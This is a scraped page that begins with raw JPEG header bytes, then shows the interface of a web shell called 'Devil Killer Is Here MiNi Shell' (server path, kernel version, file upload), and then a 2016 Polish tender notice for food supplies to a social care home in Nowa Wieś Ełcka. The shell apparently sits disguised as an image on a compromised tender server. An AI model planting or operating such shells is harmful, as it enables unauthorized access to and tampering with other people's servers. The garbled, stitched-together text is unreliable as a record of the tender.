JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160613/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160613/82285-N-2016.html

<p class="kh_header"><b>Nowa Wieś Ełcka: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 82285 - 2016; data zamieszczenia: 13.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Nowej Wsi Ełckiej , ul. Lipowa 1, 19-321 Nowa Wieś Ełcka, woj. warmińsko-mazurskie, tel. 087 6197770, 6197779, faks 087 6197490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsnwe.fantex.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi dostawa artykułów spożywczych dla potrzeb Domu Pomocy Społecznej. Przedmiot zamówienia podzielony został odpowiednio na 6 części, zgodnie z załącznikiem nr 1: (część 1 dostawa pieczywa), (część 2 dostawa mleka i jego przetworów), (część 3 dostawa produktów spożywczych), (część 4 dostawa ryb, przetworów rybnych i mrożonek), (część 5 dostawa mięsa i wędlin), (część 6 dostawa warzyw i owoców )...</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.61.25.00-6, 15.50.00.00-3, 15.80.00.00-6, 15.20.00.00-0, 15.10.00.00-9, 03.20.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełnione i podpisane oświadczenie zgodnie z art. 22 ust.1 i art. 24 ust. 1 i 2 ustawy PZP według załącznika Nr 2 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
b) z powodu zmiany uwarunkowań prawnych i formalnych m.in. związanych ze zmianą podatku VAT
c) Zmiany wykonania umowy na skutek okoliczności, niezależnych i obiektywnych, których Zamawiający nie mógł przewidzieć w dacie sporządzenia SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsnwe.fantex.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Nowa Wieś Ełcka ul. Lipowa 1 19 - 300 Ełk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2016 godzina 09:00, miejsce: Dom Pomocy Społecznej Nowa Wieś Ełcka ul. Lipowa 1 19 - 300 Ełk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.
Babka piaskowa posypana cukrem pudrem
200
kg
2.
Bułka drożdżowa z kruszonką
300
kg
3.
Bułka słodka z marmoladą, makiem, jagodami, jabłkiem, serem, budyniem
6000
szt
4.
Bułka tarta (500g)
300
szt
5.
Bułka wrocławska (50g)
60000
szt
6.
Chleb zwykły krojony (1kg)
15000
kg
7.
Chleb razowy ze słonecznikiem, soją, ziarnami zbóż, pestkami dyni (450g)
4000
szt
8.
Makowic extra
100
kg
9.
Ciasto jabłecznik na kruchym cieście 
100
kg
10.
Ciasto metrowiec
100
kg
11.
Ciasto marcello
100
kg
12,
Ciasto sernik na kruchym cieście
100
kg
13.
Ciasto ptasie mleczko
100
kg
14.
Ciasto rolada z bitą śmietaną i galaretką
100
kg
15.
Ciasto szachownica
100
kg
16.
Pączek z lukrem i marmoladą
5000
szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka i jego przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.
Drożdże (100g)
40
szt
2.
Jogurt owocowy (150g)
15000
szt
3.
Jogurt naturalny typu greckiego 
600
szt
4.
Jogurt pitny owocowy (250ml)
1600
szt
5.
Jogurt naturalny (180g)
800
szt
6.
Kefir naturalny (180g)
2200
szt
7.
Masło mające w składzie 60% tłuszczu (200g)
700
szt
8.
Margaryna z masłem (500g)
1400
szt
9.
Margaryna w kostce do smażenia, pieczenia (250g)
1200
szt
10.
Maślanka naturalna (1l)
320
szt
11.
Serek homogenizowany (100g)
700
szt
12.
Serek topiony w kostce (100g) z pieczarkami, szynką, szczypiorkiem i z ziołami
4000
szt
13.
Serek topiony w trójkącikach z pieczarkami, szynką, szczypiorkiem i z ziołami 200g (8sztuk po 25g)
750
szt
14.
Serek wiejski naturalny (200g)
6000
szt
15.
Ser topiony w plastrach (130g)
1800
szt
16.
Serek twarogowy do smarowania typu sourage (100g)
1100
szt
17.
Ser żółty gouda, podlaski, edamski
1000
kg
18.
Twaróg półtłusty 
1200
kg
19.
Śmietana 18% (400g)
3900
szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.
Budyń
600
szt
2.
Chrzan (280g)
1000
szt
3.
Cukier (1kg)
3000
kg
4.
Cukier waniliowy (30g)
500
szt
5.
Curry (20g)
100
szt
6.
Cynamon
60
szt
7.
Czekolada mleczna (100g)
2000
szt
8.
Czekolada bez cukru dla diabetyków (100g)
700
szt
9.
Czosnek granulowany (20g)
700
szt
10.
Ćwikła z chrzanem (280g)
950
szt
11.
Dżem wysokosłodzony z truskawek, wiśni, czarnej porzeczki (280g)
1000
szt
12.
Dżem niskosłodzony brzoskwinia, wiśnia, truskawka, czarna porzeczka, owoce lasu (280g)
1700
szt
13.
Galaretka truskawkowa, wiśniowa, agrestowa, pomarańczowa, owoce leśne (79g)
100
szt
14.
Gałka muszkatołowa mielona
20 
szt
15.
Groszek konserwowy (400g)
80
szt
16.
Herbatniki petit-beaure (55g)
2000
szt
17.
Herbata liściasta earl grey (100g)
1200
szt
18.
Imbir (20g)
100
szt
19.
Kakao (100g)
180
szt
20.
Kasza gryczana prażona w saszetkach (4 razy po 100g)
40
szt
21.
Kasza jęczmienna mazurska w saszetkach (4 razy po 100g)
40
szt
22.
Kasza jęczmienna średnia (1kg)
350
kg
23.
Kasza manna (1kg)
230
kg
24.
Kaszka ryżowa bezmleczna owocowa (230g)
100
szt
25.
Kaszka mleczno-ryżowa owocowa (230g)
500
szt
26.
Kawa zbożowa klasyczna mająca w składzie jęczmień, żyto, cykorię i buraki cukrowe (150g)
700
szt
27.
Ketchup łagodny i pikantny mający w zawartości przynajmniej 160g pomidora w 100g ketchupu (500g) 
800
szt
28.
Kisiel (40g)
800
szt
29.
Kleik ryżowy błyskawiczny (170g)
30
szt
30.
Kukurydza konserwowa (400g)
300
szt
31.
Liść laurowy (5g)
650
szt
32.
Makaron z mąki z pszenicy durum. Kształty makaronu: świderki, muszelki małe, wstążki, rurki kolorowe, kolanka, kokardki małe, nitki (500g)
1900
szt
33.
Makaron bezglutenowy (500g)
50
szt
34.
Majeranek (6g)
650
szt
35.
Majonez napoleoński (0,9l)
550
szt
36.
Marmolada wieloowocowa twarda (1kg)
500
szt
37.
Mąka kukurydziana (1kg)
50
szt
38.
Mąka pszenna (1kg)
1200
kg
39.
Mąka ziemniaczana (1kg)
150
kg
40.
Miód naturalny wielokwiatowy (0,9l)
400
szt
41.
Musztarda kremska, sarepska, chrzanowa (0,9l)
600
szt
42.
Ocet spirytusowy 10% (0,5l)
120
szt
43.
Ogórek konserwowy (0,9l)
600
szt
44.
Olej z pierwszego tłoczenia filtrowany na zimno (1l)
600
szt
45.
Papryka marynowana (0,9l)
400
szt
46.
Papryka w proszku słodka, ostra (16g)
300
szt
47.
Pasztecik sojowy z papryką, pieczarkami, pomidorami, koperkiem (105g)
50
szt
48.
Pieczywo chrupkie bezglutenowe(100g)
130
szt
49.
Pieprz naturalny (15g)
600
szt
50.
Pieprz ziołowy (15g)
600
szt
51.
Płatki owsiane (0,5kg)
230
szt
52.
Płatki śniadaniowe z miodem, czekoladowe (500g)
50
szt
53.
Płatki kukurydziane bezglutenowe (500g)
40
szt
54.
Przyprawa typu jarzynka w proszku (1kg)
220
szt
55.
Przyprawa w płynie do zup i sosów z wyciągiem z lubczyku (1l)
200
szt
56.
Ryż (1kg)
450
kg
57.
Ryż paraboilet w saszetkach 
120
szt
58.
Sałatka szwedzka marynowana (0,9 l)
300
szt
59.
Soczek owocowy przecierowy marchew, jabłko + trzeci dowolny smak owocu, soczek powinien mieć w składzie przynajmniej 47% koncentratu owocowego (330ml)
10000
szt
60.
Sok owocowy 100% jabłko, pomarańcza (1l)
2000
szt
61.
Sok pomidorowy (330 ml)
1500
szt
62.
Sok wielowarzywny (330 ml)
1500
szt
63.
Sos do makaronu boloński, słodko-kwaśny, chiński (0,9l)
240
szt
64.
Sól kamienna (1kg)
650
kg
65.
Syrop owocowy o zawartości ekstraktu ogólnego co najmniej 65% (440ml)
1800
szt
66.
Szczaw krojony (380g)
480
szt
67.
Tłuszcz roślinny 40% (olej słonecznikowy) do użycia w piecach konwekcyjno-parowych 3,7 l
25
szt
68.
Wafelki (100g)
2000
szt
69.
Ziele angielskie (20g)
500
szt
70.
Zakwas na żurek (500ml)
240
szt
71.
Żelatyna (50g)
100
szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa ryb, przetworów rybnych i mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.
Brukselka
200
kg
2.
Dorsz wędzony
200
kg
3.
Fasolka szparagowa
500
kg
4.
Filet z makreli wędzony
200
kg
5.
Filet z makreli w pomidorach w puszce (300g)
200
szt
6.
Filet z makreli w oleju w puszce (300g)
200
szt
7.
Filet śledziowy w pomidorach w puszce (300g)
200
szt
8.
Filet śledziowy w oleju w puszcze (300g)
200
szt
9.
Filet z miruny ze skórą SHP (kawałki w tafli 230-280g)


10.
Kalafior
500
kg
11.
Karp płaty
100
kg
12.
Kopytka 
130
kg
13.
Kluski śląskie
130
kg
14.
Makrela wędzona
200
kg
15.
Marchew mrożona kostka
800
kg
16.
Mieszanka kompotowa 7-składnikowa (śliwka, wiśnia, rabarbar, truskawka, porzeczka czerwona, porzeczka czarna) 
1250
kg
17.
Mieszanka warzywna
800
kg
18.
Matias-filet śledziowy solony w oleju
60
kg
19.
Matias-filet śledziowy marynowany w oleju
60
kg
20.
Paluszki rybne z fileta 
200
kg
21.
Paprykarz szczeciński w puszcze (300g)
300
szt
22.
Pierogi z kapustą i grzybami
60
kg
23.
Pierogi z mięsem
120
kg
24.
Pyzy z mięsem
180
kg
25.
Sałatka rybna w puszcze (300g)
300
szt
26.
Śledź -płaty marynowane
60
kg
27.
Śledź-płaty solone 
60
kg
28.
Szprot w oleju w puszcze (300g)
200
szt
29.
Szprot w pomidorach w puszcze (300g)
200
szt
30.
Truskawka mrożona
400
kg
31.
Wiśnia mrożona z pestką
200
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.
Baleron
50
kg
2.
Boczek wędzony parzony
120
kg
3.
Boczek surowy bez żeberek
120
kg
4.
Boczek-rolada wysokogatunkowa
30
kg
5.
Boczek wędzony typu swojskiego, wysokogatunkowy
30
kg
6.
Filet z kurczaka
250
kg
7.
Filet z indyka
150
kg
8.
Filet z indyka wędzony wysokogatunkowy
300
kg
9.
Flak wołowy krojony
200
kg
10.
Golonka wieprzowa przednia z/k
25
kg
11.
Golonka konserwowa
35
kg
12.
Golonka z indyka surowa
30
kg
13.
Karczek wieprzowy b/k (vacum)
120
kg
14.
Karczek wędzony wysokogatunkowy
50
kg
15.
Kaszanka
100
kg
16.
Kiełbasa biała surowa wysokogatunkowa
120
kg
17.
Kiełbasa śląska
40
kg
18.
Kiełbasa krakowska sucha wieprzowa
60
kg
19.
Kiełbasa krakowska parzona
40
kg
20.
Kiełbasa podwawelska
40
kg
21.
Kiełbasa toruńska
40
kg
22.
Kiełbasa palcówka wędzona wysokogatunkowa
100
kg
23.
Kiełbasa parówkowa
40
kg
24.
Kiełbasa szynkowa wieprzowa
40
kg
25.
Kiełbasa żywiecka wieprzowa
40
kg
26
Kiełbasa cienka z piersi kurczaka (zawartość mięsa minimum 93%)
120
kg
27.
Konserwa mięsna (la`schmit, mielonka wieprzowa, turystyczna 300 g)
50
szt
28.
Kości karkowe
400
kg
29.
Kości schabowe
400
kg
30.
Kurczak cały świeży
180
kg
31.
Łopatka wieprzowa b/k (vacum)
500
kg
32.
Łopatka wołowa b/k 
150
kg
33.
Mortadela z warzywami, pieczarkami, serem
30
kg
34.
Mielonka wieprzowa w bloku
30
kg
35.
Mięso gulaszowe indycze
60
kg
36.
Mięso z kurczaka bez skóry
60
kg
37.
Nogi wieprzowe
65
kg
38.
Ozory wieprzowe
90
kg
39.
Parówki paluszki typu hot-dog
120
kg
40.
Parówki a´la cielęce (zawartość mięsa przynajmniej 70%)
50
kg
41.
Parówki z szynki (zawartość mięsa przynajmniej 90%)
50
kg
42.
Pasztet na wagę
50
kg
43.
Pasztetowa w osłonce foliowej
30
kg
44.
Pasztetowa we flaku
50
kg
45.
Pasztet drobiowy, drobiowo-wieprzowy w konserwie, w słoiku (300g)
300
szt
46.
Podgardle surowe bez skóry
40
kg
47.
Podudzie wędzone z kurczaka
150 
kg
48.
Porcje rosołowe
600
kg
49.
Polędwica sopocka
200
kg
50.
Polędwica drobiowa
200
kg
51.
Pieczeń wieprzowa
60
kg
52.
Rolada z kurczaka
60
kg
53.
Salami z osypką czosnkową, cebulową, paprykową, z suszonych pomidorów
60
kg
54.
Salceson 
80
kg
55.
Schab wp b/k (vacum)
600
kg
56.
Schab wędzony wysokogatunkowy
80
kg
57.
Serdelki wieprzowe
30
kg
58.
Słonina surowa bez skóry
50
kg
59.
Szynka wieprzowa wędzona
60
kg
60.
Szynka wieprzowa wysokogatunkowa
80
kg
61.
Szynka drobiowa konserwowa
80
kg
62.
Szynka wieprzowa konserwowa
80
kg
63.
Szynka wp b/k (vacum)
120
kg
64.
Udka z kurczaka
600
kg
65.
Udziec z indyka surowy
100
kg
66.
Udziec z kurczaka
100
kg
67.
Podudzie surowe z kurczaka
250
kg
68.
Wątróbka z indyka
100
kg
69.
Wieprzowa II
100
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.
Banany
1400
kg
2.
Biała rzodkiew
60
kg
3.
Botwina
240
pęczek
4.
Brokuł
400
szt
5.
Brzoskwinie
3000
kg
6.
Buraki
600
kg
7.
Cebula
450
kg
8.
Cebula cukrowa
100
kg
9.
Cebula czerwona
30
kg
10.
Cukinia
20
kg
11.
Cytryna
160
kg
12.
Fasola
150
kg
13.
Groch
100
kg
14.
Gruszki
800
kg
15.
Jabłka
1800
